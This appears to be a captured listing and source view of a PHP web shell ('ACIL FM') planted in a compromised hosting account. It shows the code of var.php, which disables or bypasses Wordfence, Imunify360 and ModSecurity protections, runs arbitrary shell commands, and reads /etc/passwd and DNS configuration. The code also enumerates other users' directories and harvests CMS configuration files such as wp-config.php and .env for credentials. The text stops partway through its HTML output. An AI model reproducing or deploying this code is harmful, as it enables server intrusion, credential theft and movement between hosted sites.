ACIL FM
Current DIR:
/home/fastexsh/public_html
Nama
Ukuran
Permission
Aksi
cgi-bin
-
exchange
-
pbm_config
-
soodino
-
tether
-
.ftpquota
12 B
.htaccess
281 B
acil.php
171.42 MB
admins.php
62.68 MB
Backup_fastexIR_bot.php
23.49 MB
error_log
914 B
kromo.php
13.05 MB
term.php
140 B
var.php
165.79 MB
wp-default.php
0 B
wp-footer.php
27.72 MB
wp.php
33.07 MB
Edit file: /home/fastexsh/public_html/var.php
<!DOCTYPE html> <html lang="id" data-bs-theme="dark"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons/font/bootstrap-icons.css" rel="stylesheet"> <title>Dashboard - <?php echo $_SERVER['HTTP_HOST']; ?></title> <style> :root { --primary-color: #0d6efd; --secondary-color: #6c757d; --success-color: #198754; --danger-color: #dc3545; --warning-color: #ffc107; --info-color: #0dcaf0; --dark-bg: #121212; --darker-bg: #0a0a0a; --card-bg: #1e1e1e; --border-color: #333; } body { background-color: var(--dark-bg); color: #e0e0e0; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; } .card { background-color: var(--card-bg); border: 1px solid var(--border-color); border-radius: 10px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.3); } .table-dark { --bs-table-bg: var(--card-bg); --bs-table-striped-bg: #2c2c2c; --bs-table-hover-bg: #363636; } .btn-group-sm .btn { border-radius: 6px; } .nav-tabs .nav-link { color: #ccc; border: 1px solid transparent; } .nav-tabs .nav-link.active { background-color: var(--card-bg); border-color: var(--border-color); color: var(--primary-color); font-weight: bold; } .status-badge { padding: 4px 10px; border-radius: 20px; font-size: 0.85em; font-weight: 500; } .status-on { background-color: rgba(25, 135, 84, 0.2); color: #20c997; border: 1px solid rgba(25, 135, 84, 0.3); } .status-off { background-color: rgba(220, 53, 69, 0.2); color: #ff6b6b; border: 1px solid rgba(220, 53, 69, 0.3); } .file-icon { font-size: 1.2em; margin-right: 8px; } .folder-icon { color: #ffc107; } .file-icon-file { color: #6ea8fe; } .terminal-output { background-color: #1a1a1a; color: #00ff00; font-family: 'Consolas', 'Monaco', monospace; border: 1px solid #333; border-radius: 8px; padding: 15px; max-height: 400px; overflow-y: auto; } @media (max-width: 768px) { 
.btn-group { flex-wrap: wrap; } .btn-group .btn { margin-bottom: 5px; } .table-responsive { font-size: 0.9em; } } .breadcrumb { background-color: var(--card-bg); border-radius: 8px; padding: 10px 15px; } .breadcrumb-item a { color: #6ea8fe; text-decoration: none; } .breadcrumb-item.active { color: #ccc; } .home-dirs { background: var(--darker-bg); border-radius: 8px; padding: 10px; margin-bottom: 15px; } .home-dirs .dir-item { display: inline-block; margin: 5px; padding: 8px 12px; background: var(--card-bg); border-radius: 6px; border: 1px solid var(--border-color); } .config-badge { font-size: 0.75em; padding: 2px 6px; margin-left: 5px; } .domain-list { max-height: 300px; overflow-y: auto; } </style> </head> <body class="py-4"> <div class="container-fluid"> <?php error_reporting(0); session_start(); ob_start(); $filename = __FILE__; $file_name = basename($filename); @chmod($filename, 0444); // Security bypass headers if (function_exists('litespeed_request_headers')) { $a = litespeed_request_headers(); if (isset($a['X-LSCACHE'])) { header('X-LSCACHE: off'); } } if (defined('WORDFENCE_VERSION')) { define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true); define('WORDFENCE_DISABLE_FILE_MODS', true); } if (function_exists('imunify360_request_headers') && defined('IMUNIFY360_VERSION')) { $a = imunify360_request_headers(); if (isset($a['X-Imunify360-Request'])) { header('X-Imunify360-Request: bypass'); } if (isset($a['X-Imunify360-Captcha-Bypass'])) { header('X-Imunify360-Captcha-Bypass: ' . $a['X-Imunify360-Captcha-Bypass']); } } if (function_exists('apache_request_headers')) { $a = apache_request_headers(); if (isset($a['X-Mod-Security'])) { header('X-Mod-Security: ' . $a['X-Mod-Security']); } } if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && defined('CLOUDFLARE_VERSION')) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP']; if (isset($a['HTTP_CF_VISITOR'])) { header('HTTP_CF_VISITOR: ' . 
$a['HTTP_CF_VISITOR']); } } // ========== FUNGSI BARU YANG DITAMBAHKAN ========== // Fungsi untuk mendapatkan home directory berdasarkan user function getHomeDirectory($user = null) { if ($user === null) { if (function_exists('posix_getpwuid')) { $userInfo = posix_getpwuid(posix_geteuid()); $user = $userInfo['name']; } else { $user = get_current_user(); } } // Coba berbagai kemungkinan path home $possiblePaths = [ "/home/{$user}", "/home/{$user}/public_html", "/var/www/html/{$user}", "/usr/home/{$user}", "/Users/{$user}", // Untuk macOS "C:/Users/{$user}", // Untuk Windows "C:/xampp/htdocs/{$user}", "C:/wamp64/www/{$user}", dirname(__FILE__) // Fallback ke directory saat ini ]; foreach ($possiblePaths as $path) { if (is_dir($path) && is_readable($path)) { return $path; } } return dirname(__FILE__); // Fallback ke directory saat ini } // Fungsi untuk Jumping (HSphere, vHosts) - DIPERBAIKI function jumpToPath($type, $user = null) { $paths = []; switch($type) { case 'hsphere': $paths = [ "/home/{$user}/public_html", "/var/www/vhosts/{$user}/httpdocs", "/var/www/html/{$user}", "C:/hsphere/local/home/{$user}/public_html", "/hsphere/local/home/{$user}" ]; break; case 'vhost': $paths = [ "/etc/apache2/sites-available", "/etc/httpd/conf.d", "/usr/local/apache2/conf", "C:/xampp/apache/conf/extra", "C:/wamp64/bin/apache/apache2.4.41/conf/extra" ]; break; case 'vhosts_vhost': $paths = [ "/etc/apache2/sites-available", "/var/www/vhosts", "/home/{$user}/public_html", "/usr/local/etc/apache2/Vhosts" ]; break; } foreach ($paths as $path) { if (is_dir($path) && is_readable($path)) { return $path; } } return false; } // Fungsi untuk Grab Config (mengambil konfigurasi) - DIPERBAIKI function grabConfig($type, $source = null, $target = null) { $configFiles = []; switch($type) { case 'vhosts': $configFiles = [ '/etc/apache2/sites-available', '/etc/httpd/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', 'C:/xampp/apache/conf/httpd.conf', 
'C:/wamp64/bin/apache/apache2.4.41/conf/httpd.conf' ]; break; case 'hsphere': $configFiles = [ '/etc/hsphere/hsphere.properties', '/usr/local/hsphere/shared/config', 'C:/hsphere/shared/config' ]; break; case 'cms': // Konfigurasi CMS populer $cmsConfigs = [ 'vBulletin' => ['includes/config.php'], 'WordPress' => ['wp-config.php'], 'Joomla' => ['configuration.php'], 'WHMCS' => ['configuration.php'], 'Lokomedia' => ['conf/configuration.php'], 'Drupal' => ['sites/default/settings.php'], 'Magento' => ['app/etc/local.xml', 'app/etc/env.php'], 'PrestaShop' => ['config/settings.inc.php'], 'OpenCart' => ['config.php', 'admin/config.php'], 'Laravel' => ['.env', 'config/app.php'] ]; return $cmsConfigs; } $foundConfigs = []; foreach ($configFiles as $file) { if (is_readable($file)) { if (is_dir($file)) { // Jika berupa direktori, scan isinya $files = recursiveScan($file, ['conf', 'config', 'properties', 'ini', 'xml']); $foundConfigs = array_merge($foundConfigs, $files); } elseif (is_file($file)) { $foundConfigs[] = $file; } } } return $foundConfigs; } // Fungsi untuk mendeteksi CMS function detectCMS($directory) { $cmsConfigs = grabConfig('cms'); $detected = []; foreach ($cmsConfigs as $cms => $configs) { foreach ($configs as $config) { $configPath = $directory . '/' . $config; if (file_exists($configPath) && is_readable($configPath)) { $detected[$cms] = $configPath; break; } } } return $detected; } // Fungsi recursive directory scan tanpa shell commands function recursiveScan($directory, $extensions = [], $maxDepth = 10, $currentDepth = 0) { if ($currentDepth >= $maxDepth) { return []; } $files = []; if (!is_dir($directory) || !is_readable($directory)) { return $files; } try { $items = scandir($directory); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . 
$item; if (is_dir($path)) { // Recursive untuk subdirectory $subFiles = recursiveScan($path, $extensions, $maxDepth, $currentDepth + 1); $files = array_merge($files, $subFiles); } elseif (is_file($path) && is_readable($path)) { // Filter berdasarkan ekstensi jika diberikan if (empty($extensions)) { $files[] = $path; } else { $ext = pathinfo($path, PATHINFO_EXTENSION); if (in_array(strtolower($ext), $extensions)) { $files[] = $path; } } } } } catch (Exception $e) { // Silent error } return $files; } // Fungsi untuk membaca /etc/passwd function readEtcPasswd() { $users = []; if (is_readable('/etc/passwd')) { $passwd = file_get_contents('/etc/passwd'); if (preg_match_all('/([^:]+):x:/', $passwd, $matches)) { $users = $matches[1]; } } return $users; } // Fungsi untuk mencari user directories function findUserDirectories($pattern = null) { $users = readEtcPasswd(); $userDirs = []; foreach ($users as $user) { $possiblePaths = [ "/home/{$user}/public_html", "/home/{$user}", "/var/www/{$user}", "/usr/home/{$user}", "/hsphere/local/home/{$user}" ]; foreach ($possiblePaths as $path) { if (is_dir($path) && is_readable($path)) { if ($pattern === null || preg_match($pattern, $path)) { $userDirs[$user] = $path; break; } } } } return $userDirs; } // Fungsi untuk membaca domain dari named.conf function readDomainsFromNamedConf() { $domains = []; if (is_readable('/etc/named.conf')) { $namedConf = file_get_contents('/etc/named.conf'); if (preg_match_all('#/var/named/(.*?)\.db#', $namedConf, $matches)) { $domains = $matches[1]; } } return $domains; } // Fungsi untuk membaca domain dari valiases function readDomainsFromValiases($user) { $domains = []; $valiasesPath = "/etc/valiases/{$user}"; if (is_readable($valiasesPath)) { $content = file_get_contents($valiasesPath); if (preg_match_all('/\S+/', $content, $matches)) { $domains = $matches[0]; } } return $domains; } // Fungsi write file dengan berbagai metode function writeFile($file, $content, $mode = 'w') { // Coba menggunakan 
file_put_contents if (function_exists('file_put_contents')) { $result = @file_put_contents($file, $content); if ($result !== false) { return true; } } // Coba menggunakan fopen + fwrite if (function_exists('fopen') && function_exists('fwrite')) { $handle = @fopen($file, $mode); if ($handle) { $result = @fwrite($handle, $content); @fclose($handle); return $result !== false; } } return false; } // Fungsi read file dengan berbagai metode function readFileContent($file) { // Coba menggunakan file_get_contents if (function_exists('file_get_contents') && is_readable($file)) { $content = @file_get_contents($file); if ($content !== false) { return $content; } } // Coba menggunakan fopen + fread if (function_exists('fopen') && function_exists('fread') && is_readable($file)) { $handle = @fopen($file, 'r'); if ($handle) { $content = ''; while (!feof($handle)) { $content .= @fread($handle, 8192); } @fclose($handle); return $content; } } // Coba menggunakan highlight_file (untuk file PHP) if (function_exists('highlight_file') && is_readable($file)) { ob_start(); @highlight_file($file); $content = ob_get_clean(); if ($content) { return $content; } } return false; } // Fungsi copy dengan fallback function copyFile($source, $destination) { if (function_exists('copy')) { return @copy($source, $destination); } // Fallback manual copy if (is_readable($source)) { $content = readFileContent($source); if ($content !== false) { return writeFile($destination, $content); } } return false; } // Fungsi unarchive (extract) file function unarchiveFile($archiveFile, $extractTo = null) { if (!is_file($archiveFile) || !is_readable($archiveFile)) { return false; } if ($extractTo === null) { $extractTo = dirname($archiveFile); } $ext = strtolower(pathinfo($archiveFile, PATHINFO_EXTENSION)); // Cek ekstensi yang didukung $supported = ['zip', 'tar', 'gz', 'bz2', 'rar']; if (!in_array($ext, $supported)) { return false; } // Coba menggunakan ZipArchive untuk .zip if ($ext == 'zip' && 
class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($archiveFile) === TRUE) { $result = $zip->extractTo($extractTo); $zip->close(); return $result; } } // Coba menggunakan PharData untuk .tar, .tar.gz, .tar.bz2 if (($ext == 'tar' || $ext == 'gz' || $ext == 'bz2') && class_exists('PharData')) { try { $phar = new PharData($archiveFile); $phar->extractTo($extractTo); return true; } catch (Exception $e) { return false; } } // Coba menggunakan shell commands sebagai fallback if (function_exists('shell_exec')) { $cmd = ''; if ($ext == 'zip') { $cmd = "unzip -q '{$archiveFile}' -d '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'tar') { $cmd = "tar -xf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'gz') { $cmd = "tar -xzf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'bz2') { $cmd = "tar -xjf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'rar') { $cmd = "unrar x '{$archiveFile}' '{$extractTo}/' 2>/dev/null"; } if ($cmd) { @shell_exec($cmd); return is_dir($extractTo); } } return false; } // Fungsi untuk menampilkan syntax highlighting function highlightFileContent($file) { if (!is_file($file) || !is_readable($file)) { return false; } $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Hanya file yang bisa di-highlight $highlightable = ['php', 'html', 'htm', 'js', 'css', 'txt', 'json', 'xml', 'sql', 'conf', 'config']; if (!in_array($ext, $highlightable)) { return htmlspecialchars(readFileContent($file)); } // Coba menggunakan highlight_file untuk PHP if ($ext == 'php' && function_exists('highlight_file')) { ob_start(); @highlight_file($file); return ob_get_clean(); } // Untuk file lainnya, gunakan highlight_string atau manual highlighting $content = readFileContent($file); if ($content === false) { return false; } $content = htmlspecialchars($content); // Manual highlighting sederhana berdasarkan tipe file switch($ext) { case 'html': case 'htm': $content = 
preg_replace('/<(\/?)([a-zA-Z][a-zA-Z0-9]*)/', '<<span class="text-primary">$1$2</span>', $content); $content = preg_replace('/<!--(.*?)-->/', '<<span class="text-success">!--$1--</span>>', $content); break; case 'js': $keywords = ['function', 'var', 'let', 'const', 'if', 'else', 'for', 'while', 'return', 'true', 'false', 'null', 'undefined']; foreach ($keywords as $keyword) { $content = preg_replace('/\b' . $keyword . '\b/', '<span class="text-warning">' . $keyword . '</span>', $content); } break; case 'css': $content = preg_replace('/([^{}]+)\{/', '<span class="text-primary">$1</span>{', $content); $content = preg_replace('/\b([a-zA-Z-]+)\s*:/', '<span class="text-success">$1</span>:', $content); break; case 'conf': case 'config': $content = preg_replace('/^(\s*)([a-zA-Z_][a-zA-Z0-9_]*)\s*=/m', '$1<span class="text-warning">$2</span> =', $content); break; } return '<pre class="bg-dark text-light p-3 rounded" style="max-height: 500px; overflow: auto;">' . $content . '</pre>'; } // Fungsi untuk mendeteksi file archive di direktori function detectArchiveFiles($directory) { $archiveExtensions = ['zip', 'tar', 'gz', 'bz2', 'rar', '7z', 'tgz', 'tbz2']; $archives = []; if (!is_dir($directory) || !is_readable($directory)) { return $archives; } $items = @scandir($directory); if (!$items) return $archives; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . 
$item; if (is_file($path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); if (in_array($ext, $archiveExtensions)) { $size = formatSize($path); $archives[] = [ 'name' => $item, 'path' => $path, 'size' => $size, 'ext' => $ext ]; } } } return $archives; } // Fungsi bing search (simulasi) function bing($query) { $query = urlencode($query); $url = "https://www.bing.com/search?q={$query}&count=50"; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' ]); $html = curl_exec($ch); curl_close($ch); if (!$html) return ''; preg_match_all('/<a href="https?:\/\/([^\/"\'<> ]+)/i', $html, $matches); $domains = []; if (!empty($matches[1])) { foreach ($matches[1] as $host) { $host = strtolower($host); $host = preg_replace('/^www\./', '', $host); if (!in_array($host, $domains)) { $domains[] = $host; } } } return implode("\n", $domains); } // ========== FUNGSI LAMA ========== function detectOS() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return "Windows"; } else { return "Linux"; } } function formatSize($file) { if (!file_exists($file) || !is_readable($file)) return 'N/A'; $bytes = filesize($file); if ($bytes == 0) return '0 B'; $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . 
$sizes[$factor]; } function exe($cmd) { if(is_file($cmd)) { $buff = @file_get_contents($cmd); return htmlspecialchars($buff); } if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return htmlspecialchars($buff); } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return htmlspecialchars($buff); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return htmlspecialchars($buff); } return false; } function deleteDirectory($dir) { if (!is_dir($dir)) return false; $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { $filePath = "$dir/$file"; is_dir($filePath) ? deleteDirectory($filePath) : unlink($filePath); } return rmdir($dir); } function w($dir,$perm) { if(!is_writable($dir)) { return '<span class="badge bg-danger">'.$perm.'</span>'; } else { return '<span class="badge bg-success">'.$perm.'</span>'; } } function r($dir,$perm) { if(!is_readable($dir)) { return '<span class="badge bg-danger">'.$perm.'</span>'; } else { return '<span class="badge bg-success">'.$perm.'</span>'; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 
'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(isset($_GET['dir'])) { $dir = $_GET['dir']; @chdir($dir); } else { $dir = getcwd(); } function checkStatus($condition) { return $condition ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; } function getMyIP() { $ch = curl_init('https://api64.ipify.org'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip = curl_exec($ch); curl_close($ch); return $ip ? $ip : 'Tidak Diketahui'; } $os = detectOS(); $kernel = php_uname(); $server_ip = gethostbyname($_SERVER['HTTP_HOST']); $ip_user = getMyIP(); $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<span class="status-badge status-off">ON</span>' : '<span class="status-badge status-on">OFF</span>'; $ds = @ini_get("disable_functions"); $curl = (function_exists('curl_version')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $wget = (exe('wget --help')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $perl = (exe('perl --help')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $python = (exe('python --help')) ? 
'<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $show_ds = (!empty($ds)) ? $ds: "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } // ========== PENAMBAHAN TAB BARU ========== $additional_tabs = [ 'home' => '<i class="bi bi-house-door"></i> Home', 'fileops' => '<i class="bi bi-files"></i> File Operations', 'jumping' => '<i class="bi bi-box-arrow-in-right"></i> Jumping', 'grab' => '<i class="bi bi-download"></i> Grab Config', 'scan' => '<i class="bi bi-search"></i> Recursive Scan', 'archive' => '<i class="bi bi-file-zip"></i> Archive Tools' ]; // Header Section echo '<div class="card mb-4"> <div class="card-header bg-dark"> <div class="d-flex justify-content-between align-items-center"> <h4 class="mb-0"><i class="bi bi-terminal-fill me-2"></i>Server Dashboard</h4> <span class="badge bg-info">'.$_SERVER['HTTP_HOST'].'</span> </div> </div> <div class="card-body"> <div class="row g-3"> <div class="col-md-6"> <div class="d-flex align-items-center mb-2"> <i class="bi bi-pc-display me-2 text-primary"></i> <strong>OS:</strong> <span class="ms-2">'.$os.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-server me-2 text-primary"></i> <strong>Server IP:</strong> <span class="ms-2">'.$server_ip.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-person-circle me-2 text-primary"></i> <strong>User:</strong> <span class="ms-2">'.$user.'</span> </div> </div> <div class="col-md-6"> <div class="d-flex align-items-center mb-2"> <i class="bi bi-hdd me-2 text-success"></i> <strong>Free Space:</strong> <span class="ms-2">'.$freespace.' 
/ '.$total.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-shield-check me-2 text-warning"></i> <strong>Safe Mode:</strong> <span class="ms-2">'.$sm.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-globe me-2 text-info"></i> <strong>Your IP:</strong> <span class="ms-2">'.$_SERVER['REMOTE_ADDR'].'</span> </div> </div> </div> </div> </div>'; // Navigation Tabs echo '<div class="card mb-4"> <div class="card-body p-2"> <ul class="nav nav-tabs nav-fill" id="dashboardTab" role="tablist"> <li class="nav-item" role="presentation"> <a href="'.basename($_SERVER['PHP_SELF']).'?dir='.$dir.'" class="nav-link '.(!isset($_GET['do'])?'active':'').'"> <i class="bi bi-folder2-open"></i> File Manager </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=home" class="nav-link '.($_GET['do']=='home'?'active':'').'"> <i class="bi bi-house-door"></i> Home </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=system" class="nav-link '.($_GET['do']=='system'?'active':'').'"> <i class="bi bi-info-circle"></i> System Info </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=fileops" class="nav-link '.($_GET['do']=='fileops'?'active':'').'"> <i class="bi bi-files"></i> File Operations </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=upload" class="nav-link '.($_GET['do']=='upload'?'active':'').'"> <i class="bi bi-upload"></i> Upload </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=cmd" class="nav-link '.($_GET['do']=='cmd'?'active':'').'"> <i class="bi bi-terminal"></i> Terminal </a> </li>'; // Tambahkan tab tambahan foreach ($additional_tabs as $tab_key => $tab_name) { if (!in_array($tab_key, ['home', 'fileops'])) { echo '<li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do='.$tab_key.'" class="nav-link '.($_GET['do']==$tab_key?'active':'').'"> '.$tab_name.' 
</a> </li>'; } } echo '<li class="nav-item"> <a href="?logout=true" class="nav-link text-danger"> <i class="bi bi-box-arrow-right"></i> Logout </a> </li> </ul> </div> </div>'; // ========== PENANGANAN TAB BARU ========== // Tab Home - DIPERBAIKI (Default current dir + Common Directories) if($_GET['do'] == 'home') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-house-door me-2"></i>Home Directory & Common Directories</h5> </div> <div class="card-body">'; // Current Directory Info echo '<div class="alert alert-primary"> <i class="bi bi-folder me-2"></i> <strong>Current Directory:</strong> '.$dir.'<br> <strong>Permissions:</strong> '.w($dir, perms($dir)).' </div>'; // Current Directory Contents echo '<div class="row"> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary"> <i class="bi bi-folder me-2"></i>Current Directory Contents </div> <div class="card-body">'; if(is_dir($dir) && is_readable($dir)) { $items = @scandir($dir); if($items) { echo '<div class="list-group">'; $count = 0; foreach($items as $item) { if($item == '.' || $item == '..') continue; $count++; if($count > 20) { echo '<div class="list-group-item bg-dark text-light"> <i class="bi bi-three-dots me-2"></i>... and more </div>'; break; } $full_path = $dir . '/' . $item; $is_dir = is_dir($full_path); $icon = $is_dir ? 'bi-folder-fill text-warning' : 'bi-file-earmark text-info'; $size = $is_dir ? '<span class="badge bg-warning">DIR</span>' : '<span class="badge bg-secondary">'.formatSize($full_path).'</span>'; echo '<div class="list-group-item bg-dark text-light"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon.' me-2"></i> '.htmlspecialchars($item).' </div> <div> '.($is_dir ? 
'<a href="?dir='.urlencode($full_path).'" class="btn btn-sm btn-outline-primary" title="Open Directory"> <i class="bi bi-box-arrow-in-right"></i> </a>' : '<a href="?act=view&dir='.urlencode($dir).'&file='.urlencode($full_path).'" class="btn btn-sm btn-outline-info" title="View File"> <i class="bi bi-eye"></i> </a>' ).' '.$size.' </div> </div> </div>'; } echo '</div>'; // Show total count $total_items = count($items) - 2; // subtract . and .. echo '<div class="mt-2 text-center"> <small class="text-muted">Showing '.min(20, $total_items).' of '.$total_items.' items</small> </div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot scan directory </div>'; } } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot read current directory </div>'; } echo '</div></div></div>'; // Common Directories echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary"> <i class="bi bi-folder-symlink me-2"></i>Common Directories </div> <div class="card-body"> <div class="mb-3"> <input type="text" id="searchDirs" class="form-control bg-dark text-light" placeholder="Search directories..." 
onkeyup="filterDirectories()"> </div>'; $common_dirs = [ '/' => ['Root Directory', 'bi-hdd'], '/home' => ['Home Directory', 'bi-house-door'], '/home/'.$user => ['User Home', 'bi-person'], '/home/'.$user.'/public_html' => ['Public HTML', 'bi-globe'], '/var/www/html' => ['Apache Root', 'bi-server'], '/var/www' => ['Web Directory', 'bi-folder'], '/tmp' => ['Temp Directory', 'bi-clock'], '/etc' => ['System Configuration', 'bi-gear'], '/usr/local' => ['Local Programs', 'bi-terminal'], '/opt' => ['Optional Software', 'bi-box'], '/root' => ['Root Home', 'bi-person-check'], '/proc' => ['Process Info', 'bi-diagram-3'], '/sys' => ['System Info', 'bi-cpu'], '/dev' => ['Device Files', 'bi-device-hdd'], '/mnt' => ['Mount Points', 'bi-usb-drive'], '/media' => ['Removable Media', 'bi-usb-plug'], '/srv' => ['Service Data', 'bi-hdd-stack'], '/boot' => ['Boot Files', 'bi-power'], '/lib' => ['System Libraries', 'bi-book'], '/bin' => ['System Binaries', 'bi-terminal'], '/sbin' => ['System Admin Binaries', 'bi-terminal-fill'], '/usr/bin' => ['User Binaries', 'bi-terminal'], '/usr/sbin' => ['User Admin Binaries', 'bi-terminal-fill'], '/usr/local/bin' => ['Local User Binaries', 'bi-terminal'], '/usr/local/sbin' => ['Local Admin Binaries', 'bi-terminal-fill'], '/var/log' => ['Log Files', 'bi-journal-text'], '/var/tmp' => ['Variable Temp', 'bi-clock-history'], '/var/run' => ['Runtime Data', 'bi-play-circle'], '/var/lock' => ['Lock Files', 'bi-lock'], '/var/spool' => ['Spool Directory', 'bi-printer'], '/var/mail' => ['Mail Directory', 'bi-envelope'], '/var/cache' => ['Cache Files', 'bi-lightning'] ]; echo '<div class="list-group domain-list" id="dirList">'; foreach($common_dirs as $path => $dir_info) { list($desc, $icon_class) = $dir_info; if(is_dir($path) && is_readable($path)) { // Get directory info $item_count = 0; $size_info = 'DIR'; if($handle = @opendir($path)) { while(false !== ($entry = readdir($handle))) { if($entry != '.' 
&& $entry != '..') { $item_count++; } } closedir($handle); } $permissions = perms($path); $writable = is_writable($path); $perm_badge = $writable ? '<span class="badge bg-success ms-1">W</span>' : '<span class="badge bg-danger ms-1">R</span>'; echo '<a href="?dir='.urlencode($path).'" class="list-group-item list-group-item-action bg-dark text-success dir-item"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon_class.' me-2"></i> <strong>'.$desc.'</strong> '.$perm_badge.' </div> <div> <span class="badge bg-info">'.$item_count.' items</span> </div> </div> <div class="d-flex justify-content-between align-items-center mt-1"> <small class="text-muted"> <i class="bi bi-folder me-1"></i>'.$path.' </small> <small class="text-muted"> <i class="bi bi-shield me-1"></i>'.$permissions.' </small> </div> </a>'; } else { echo '<div class="list-group-item bg-dark text-secondary dir-item"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon_class.' me-2"></i> <strong>'.$desc.'</strong> <span class="badge bg-secondary ms-1">N/A</span> </div> </div> <div class="mt-1"> <small class="text-muted"> <i class="bi bi-folder me-1"></i>'.$path.' 
